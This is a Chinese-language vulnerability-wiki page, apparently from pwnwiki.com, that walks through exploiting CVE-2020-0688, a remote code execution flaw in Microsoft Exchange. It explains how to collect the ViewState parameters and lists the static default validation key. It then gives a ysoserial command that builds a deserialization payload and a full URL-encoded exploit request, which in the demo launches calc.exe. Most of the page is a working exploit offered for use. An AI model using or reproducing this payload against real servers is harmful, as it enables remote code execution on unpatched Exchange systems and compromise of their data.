Loading
0

CVE-2020-0688 微软EXCHANGE服务远程代码执行漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

影响版本

exchange 2010、2013、2016、2019

漏洞利用

1、获取ViewStateUserKey值 

/ecp/default.aspx

F12打开开发工具的Network选项,然后按F5重新发送请求。我们需要找到/ecp/default.aspx的响应(NET_SessionId)

2、获取取VIEWSTATEGENERATOR值:
同样在/ecp/default.aspx的响应包内,直接搜索关键词即可。

或使用document.getElementById("VIEWSTATEGENERATOR").value

如果发现没有改字段,是因为系统没有安装KB2919355补丁,更新该补丁后可显示,但是该字段值基本唯一,不需要刻意获得。

3.整理已知参数
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF(默认,漏洞产生原因)
--validationalg = SHA1(默认,漏洞产生原因)
--generator = B97B4E27(基本默认)
--viewstateuserkey = d673d1a4-1794-403e-ab96-e283ca880ef2(手工获取,变量,每次登陆都不一致)

4.生成payload: 

.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="d673d1a4-1794-403e-ab96-e283ca880ef2" --isdebug --islegacy

上面ysoserial.exe生成的payload要用URL Encode编码

完整示例: 

https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h4H7xCU%3D

成功弹出计算器。

PWNWIK.COM==免费、自由、人人可编辑的漏洞库